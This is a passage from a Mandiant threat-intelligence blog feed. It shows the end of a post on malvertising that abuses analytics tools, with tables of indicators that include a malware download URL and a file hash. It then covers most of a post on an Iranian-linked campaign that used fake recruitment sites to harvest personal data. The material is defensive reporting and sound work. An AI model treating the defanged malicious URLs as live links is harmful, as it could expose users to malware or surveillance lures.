41.5524%;"/><col style="width: 21.6909%;"/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Filename</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">MD5</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Description</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Advanced_IP_Scanner_v.3.5.2.1.zip</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5310d6b73d19592860e81e4e3a5459eb</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malicious archive file</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p> </p> </div> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: 
#5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">URL</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">IP Address</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Description</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hxxps://ktgotit[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">172.67.216[.]166</span></p> <p><span style="vertical-align: baseline;">(Cloudflare Netblock)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malvertising landing page</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 
16px;"> <p><span style="vertical-align: baseline;">hxxps://aadvanced-ip-scanner[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">82.221.136[.]1</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cloaked lure page</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hxxps://britanniaeat[.]com/wp-includes<br/>/Advanced_IP_Scanner_v.3.5.2.1.zip</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">3.11.24[.]22</span></p> <p><span style="vertical-align: baseline;">(Amazon Netblock)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malware download URL</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">In a digital world where every click leaves a trace, the line between data analytics tooling built around marketing demographics and malware attack campaign optimization has blurred to a dangerous degree. As the capabilities of legitimate tooling increase, so too will the capabilities of threat actors who choose to use them for nefarious purposes.
However, as the practical examples throughout this blog post demonstrate, by understanding how attackers use these tools and by proactively taking steps to mitigate or eliminate their effects, defenders can mount a viable and impactful defense against them.</span></p> <h2><span style="vertical-align: baseline;">Special Acknowledgments</span></h2> <p><span style="vertical-align: baseline;">Adrian McCabe would like to thank Joseph Flattery for his subject matter expertise on digital marketing tools.</span></p> <p><span style="vertical-align: baseline;">The authors would like to thank Mandiant Advanced Practices for their in-depth review of associated threat indicators.</span></p></div></description><pubDate>Thu, 29 Aug 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/how-attackers-weaponize-digital-analytics-tools/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>A Measure of Motive: How Attackers Weaponize Digital Analytics Tools</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/how-attackers-weaponize-digital-analytics-tools/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation</title><link>https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/</link><description><div class="block-paragraph_advanced"><p>Written by: Ofir Rozmann, Asli Koksal, Sarah Bock</p> <hr/></div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">Today Mandiant is releasing details of a suspected Iran-nexus counterintelligence operation aimed at
collecting</span><span style="vertical-align: baseline;"> data on Iranians and domestic threats who may be collaborating with intelligence and security agencies abroad, particularly in Israel. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The data collected by this campaign may support </span><span style="vertical-align: baseline;">the Iranian intelligence apparatus in pinpointing individuals who are interested in collaborating with Iran’s perceived adversarial countries. The collected data may be leveraged </span><span style="vertical-align: baseline;">to uncover human intelligence (HUMINT) operations conducted against Iran and to persecute any Iranians suspected to be involved in these operations. </span><span style="vertical-align: baseline;">These may include Iranian dissidents, activists, human rights advocates, and Farsi speakers living in and outside Iran.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant assesses with high confidence this campaign was operated on behalf of Iran’s regime, based on its tactics, techniques, and procedures (TTPs), themes, and targeting. In addition, we observed a weak overlap between this campaign and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations"><span style="text-decoration: underline; vertical-align: baseline;">APT42</span></a><span style="vertical-align: baseline;">, an Iran-nexus threat actor suspected to operate on behalf of Iran’s IRGC Intelligence Organization (IRGC-IO). This campaign’s activities are in line with Iran’s IRGC and APT42’s history of conducting surveillance operations against domestic threats and individuals of interest to the Iranian government. Despite the possible APT42 connection, Mandiant observed no relations between this activity and any U.S. 
elections-related targeting as previously </span><a href="https://blog.google/threat-analysis-group/iranian-backed-group-steps-up-phishing-campaigns-against-israel-us/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> by Google's Threat Analysis Group.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The activity used multiple social media accounts to disseminate a network of over 35 fake recruiting websites containing extensive Farsi decoy content, including job offers and Israel-related lures, such as images of Israeli national symbols, hi-tech offices, and major city landmarks. Upon entry, the targeted users are required to enter their personal details as well as their professional and academic experience, which are subsequently sent to the attackers. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The suspected counterintelligence operations started as early as 2017 and lasted at least until March 2024. In the past, similar campaigns were deployed in Arabic, targeting individuals affiliated with Syria and Hezbollah intelligence and security agencies. This may indicate Iran’s counterintelligence activities extend beyond its own security and intelligence apparatus, possibly in support of its allies in Syria and Lebanon. 
</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant worked to help ensure this activity was blocked and disrupted, the threat actor’s accounts were terminated, and </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Chrome users</span></a><span style="vertical-align: baseline;"> and the users of other browsers were protected.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">Attack Lifecycle</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">This activity leverages a network of fake recruitment websites posing as Israel-based human resources firms that use similar imagery in attempts to socially engineer Farsi-speaking individuals into providing personal details. The websites were disseminated online including through fake social media accounts, and used similar templates. The attack lifecycle is depicted in Figure 1.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig1.max-1000x1000.png" alt="Attack lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="1s8zz">Figure 1: Attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">The activity consists of several stages.</span></p> <h3 style="text-align: left;"><span style="vertical-align: baseline;">Step 1: Disseminate Links to Fake Recruitment Websites</span></h3> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant identified multiple fake social media accounts promoting the websites on various social platforms, 
such as X (formerly Twitter) and Virasty, commonly used in Iran. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The following X post contains a link to the malicious website, topwor4u[.]com, as well as the following description translated from Farsi:</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">“In the past year, we were able to attract hundreds of information and cyber professionals and achieve unique successes at the global level.</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">If you have information and cyber work experience, join us”.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig2.max-1000x1000.png" alt="Posts by @MiladAzadihr, a Twitter profile promoting the fake recruitment website topwor4u[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="ezgnc">Figure 2: Posts by @MiladAzadihr, a Twitter profile promoting the fake recruitment website topwor4u[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig3.max-1000x1000.png" alt="Post by @A_Soleimani_Far, a Virasty (Iranian social network) profile promoting the fake recruitment website joinoptimahr[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="2mkoc">Figure 3: Post by @A_Soleimani_Far, a Virasty (Iranian social network) profile promoting the fake recruitment website 
joinoptimahr[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3 style="text-align: left;"><span style="vertical-align: baseline;">Step 2: Fake Job Offer Websites Presenting Israel-Related Decoy Content</span></h3> <p style="text-align: left;"><span style="vertical-align: baseline;">Upon entering the website, the user is presented with the alleged purpose of the fake human resources firms: “[to] recruit employees and officers of Iran’s intelligence and security organizations.” </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The fake recruitment websites share templates and content, posing as HR firms, like “Optima HR” or “Kandovan HR.”</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline; text-align: left;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The websites contain an elaborate description written in Farsi, presenting the alleged human resources firm as “active in the fields of international information and security/cyber consulting and research worldwide”. 
</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The websites contain a Farsi description of the “Terms of Cooperation” with the fake HR firm:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">“Having relevant documented experience and resume in the field of information and cyber in related institutions and organizations (Mandatory).</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">Protecting your privacy is our priority.<br/></span><span style="font-style: italic; vertical-align: baseline;">Excellent salary for the chosen ones.</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">Our center invites you to contact us to submit a job offer and receive special and unique projects!!</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">Join us to help each other impact the world.<br/></span><span style="font-style: italic; vertical-align: baseline;">Our duty is to protect your privacy.”</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Mandiant observed both desktop and mobile versions of the website beparas[.]com displaying similar contents and lures affiliated with Israel, including Israel’s flag and major city landmarks.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig4.max-1000x1000.png" alt="Mobile version of the fake website
beparas[.]com, used between January and March 2024"> </a> <figcaption class="article-image__caption "><p data-block-key="vunsc">Figure 4: Mobile version of the fake website beparas[.]com, used between January and March 2024</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig5.max-1000x1000.png" alt="Desktop and mobile versions of the website beparas[.]com used in February 2024; the left web page also includes a form and a Telegram contact link"> </a> <figcaption class="article-image__caption "><p data-block-key="vunsc">Figure 5: Desktop and mobile versions of the website beparas[.]com used in February 2024; the left web page also includes a form and a Telegram contact link</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The websites contain Telegram contact links, using handles that contain “IL” (Israel) references, further enhancing the perceived Israel-affiliation of the campaign. 
For example:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/Phantom</span><strong style="font-style: italic; vertical-align: baseline;">IL</strong><span style="font-style: italic; vertical-align: baseline;">13</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/getDm</span><strong style="font-style: italic; vertical-align: baseline;">IL</strong><span style="font-style: italic; vertical-align: baseline;"> </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Several fake recruitment websites also contained a link to join a Telegram chat:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/joinchat/AAAAAFgDeSXaWr2r_AQImw</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Further inspection of the domain beparas[.]com indicated the WordPress user data for the website is publicly available and lists the username “miladix” as well as </span><a href="https://support.gravatar.com/account/wordpress/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Gravatar</span></a><span style="vertical-align: baseline;"> URLs likely affiliated with this user (see the following screenshot). 
The value "b7e2f4a5bc67256189e6732fbce86520" in the Gravatar URLs is the SHA-256 value of the user’s email, according to Gravatar </span><a href="https://docs.gravatar.com/general/hash/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">documentation</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The nickname "Miladix" might be related to “Milad Azadi,” the name of the X account used by the campaign, mentioned previously. In addition, "Milad" is a Persian name, further strengthening the campaign’s affiliation with Iran.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Mandiant observed a domain miladix[.]com, affiliated with an Iranian software developer, although no links were found tying the campaign to miladix[.]com or its operator.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig6.max-1000x1000.png" alt="Screenshot of the WordPress user&#x27;s URL of beparas[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="vunsc">Figure 6: Screenshot of the WordPress user's URL of beparas[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3 style="text-align: left;"><span style="vertical-align: baseline;">Step 3: Targeted User Fills Out Form, Personal and Professional Details Sent to Attackers</span></h3> <p style="text-align: left;"><span style="vertical-align: baseline;">The fake
recruitment websites contain a form that includes the fields: name, birth date, email, home address, education, and professional experience.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig7.max-1000x1000.png" alt="Fake personal details form"> </a> <figcaption class="article-image__caption "><p data-block-key="pcxos">Figure 7: Fake personal details form</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2 style="text-align: left;"><span style="vertical-align: baseline;">“Axis of Resistance”: Historic Operations Targeting Syria and Hezbollah</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">Close inspection of the fake “Optima HR” websites revealed a previous network of fake recruitment websites that targeted Farsi speakers as well as Arabic speakers affiliated with Syria and Lebanon (Hezbollah), masquerading as a different HR firm named “VIP Human Solutions.”</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The “VIP Human Solutions” sites used very similar imagery and themes, purporting to recruit for security- and intelligence-related jobs using Israel-affiliated decoy content, as can be seen in Figure 8.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig8.max-1000x1000.png" alt="Logos of VIP Human Solutions (2020–2023, left) and Optima HR (2022–2024, right)"> </a> <figcaption class="article-image__caption "><p data-block-key="pcxos">Figure 8: Logos of VIP Human Solutions
(2020–2023, left) and Optima HR (2022–2024, right)</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig9.max-1000x1000.png" alt="dreamy-jobs[.]com, a fake “VIP Human Solutions” website used in 2022"> </a> <figcaption class="article-image__caption "><p data-block-key="pcxos">Figure 9: dreamy-jobs[.]com, a fake “VIP Human Solutions” website used in 2022</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">The “VIP Human Solutions” website’s contents, template, and personal details form are almost identical to the “Optima HR” website. The headline translates to:</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">“VIP job selection is a recruitment center for respected personnel and employees of Iran's security and intelligence organizations and institutions.”</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant observed significant overlaps between the historic “VIP Human Solutions” campaign and the ongoing “Optima HR” campaign, and considers both to be deployed by the same threat actor. 
The activity was mentioned publicly in the past and was suspected to be related to the Israeli Mossad.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig10.max-1000x1000.png" alt="A Tweet from January 2021 mentioning “VIP Human Solutions”"> </a> <figcaption class="article-image__caption "><p data-block-key="pcxos">Figure 10: A Tweet from January 2021 mentioning “VIP Human Solutions”</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Mandiant observed that the aforementioned Telegram group chat, which has been active since at least 2021, was used by both clusters:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/joinchat/AAAAAFgDeSXaWr2r_AQImw</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The same link was embedded in multiple “VIP Human Solutions” websites, occasionally along with Israel (+972) phone numbers and additional Telegram accounts:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/DreamyJobs_com<br/></span><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/wazayif_IL<br/></span><span style="font-style: italic; vertical-align: baseline;">“wazayif” is the English transliteration of the Arabic word for “jobs” (وظايف)</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The
“VIP Human Solutions” recruitment websites were likely in use from at least 2018 to at least 2023. In addition to Farsi websites, the cluster used Arabic websites with similar templates.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Translation of the Arabic website’s title: </span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">“VIP Recruitment, a center for recruiting respected military personnel into the army, security services and intelligence from Syria and Hezbollah, Lebanon.”</span><span style="vertical-align: baseline;"> </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig11.max-1000x1000.png" alt="wazayif-halima[.]com, an Arabic-language “VIP Human Solutions” website, used in 2021–2022 to target Syria and Hezbollah&#x27;s intelligence personnel"> </a> <figcaption class="article-image__caption "><p data-block-key="avzqd">Figure 11: wazayif-halima[.]com, an Arabic-language “VIP Human Solutions” website, used in 2021–2022 to target Syria and Hezbollah's intelligence personnel</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant also observed another version of the same website in 2023, which includes the “Lorem Ipsum” dummy text in Arabic, possibly indicating that the updated version of the website was not yet operational.
The template includes the Syrian flag and map, an Israeli phone number (+972), and a Telegram contact link: </span><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/DreamyJobs_com.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig12.max-1000x1000.png" alt="An updated version of wazayif-halima[.]com observed in July 2023"> </a> <figcaption class="article-image__caption "><p data-block-key="avzqd">Figure 12: An updated version of wazayif-halima[.]com observed in July 2023</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">While the “VIP Human Solutions” domains were registered beginning in 2020, Mandiant observed further historic evidence suggesting that the campaign has been active since at least 2018. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Specifically, a YouTube channel named “VIP Human Solutions” was created by “Alireza Ebrahimpoor” in November 2018. The channel contains a single video by “VIP Jobs Global,” with a Farsi description very similar to the fake recruitment websites’, presented as a “recruitment center for retirees and employees of Iran’s security and intelligence organizations and institutions”. 
<span style="vertical-align: baseline;">The threat actor-controlled YouTube channel is no longer available.</span></span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig13.max-1000x1000.png" alt="“VIP Human Solutions” YouTube channel: hxxps://www[.]youtube[.]com/@vipjobsglobal1819"> </a> <figcaption class="article-image__caption "><p data-block-key="avzqd">Figure 13: “VIP Human Solutions” YouTube channel: hxxps://www[.]youtube[.]com/@vipjobsglobal1819</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">The video has very similar content and theme as the fake recruitment websites, including the use of the unique logo of “VIP Human Solutions.”</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig14.max-1000x1000.png" alt="Screenshot of the “VIP Human Solutions” video"> </a> <figcaption class="article-image__caption "><p data-block-key="avzqd">Figure 14: Screenshot of the “VIP Human Solutions” video</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The video also contains the following contact details:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Email address: sendcv@vipjobsglobal[.]com. 
The domain vipjobsglobal[.]com was registered in March 2018.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Facebook page: hxxps://facebook[.]com/358690841262928, which started operating in December 2017 and is no longer active.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The following table compares the historic activity with the new activity described in the previous section:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">“VIP Human Solutions”</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">“Optima HR”</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Years Active</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: 
center;"><span style="vertical-align: baseline;">2017-2022</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">2022-2024</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Languages</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Farsi</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">Arabic</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Farsi</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Targeted Regions</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Iran, Syria and Hezbollah </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Iran</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Example Domains (full list in the IOCs section)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">bilal1com[.]com (Farsi)</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">jomehjob[.]com (Farsi)</span></p> <p style="text-align: center;"><span 
